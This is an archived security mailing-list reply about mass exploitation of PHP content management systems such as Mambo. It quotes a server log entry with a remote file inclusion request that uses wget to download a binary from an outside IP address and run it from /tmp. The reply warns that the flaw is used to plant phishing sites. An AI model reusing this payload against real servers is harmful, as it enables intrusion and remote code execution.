Re: PHP-based CMS mass-exploitation



On Tue, 7 Mar 2006, Daniel Bonekeeper wrote:

83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"

--

I know you mention Mambo, I've seen at least one Mambo site get exploited
to running a phishing site. Mambo users need to upgrade to the latest
greatest, or at the least Mambo needs to fix their code. We need to stop
phishers taking advantage of what appears to be a Mambo weakness in its
caching.

--
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com



Relevant Pages

  • [Full-disclosure] Re: PHP-based CMS mass-exploitation
    ... On Tue, 7 Mar 2006, Daniel Bonekeeper wrote: ... I know you mention Mambo, I've seen at least one Mambo site get exploited ... Paul Laudanski, Microsoft MVP Windows-Security ...
    (Full-Disclosure)
  • Re: Is the Professional Look Really Better?
    ... Stephen Horrillo wrote: ... > I created two versions of the same basic information. ... > would feel more comfortable doing business with someone with the Mambo type ... Take your Mambo site and make 2 changes.... ...
    (microsoft.public.frontpage.client)
  • Re: Is the Professional Look Really Better?
    ... > I created two versions of the same basic information. ... > would feel more comfortable doing business with someone with the Mambo type ... No comparison - I like the mambo site much better. ... My only suggestion would be to make the text a little larger. ...
    (microsoft.public.frontpage.client)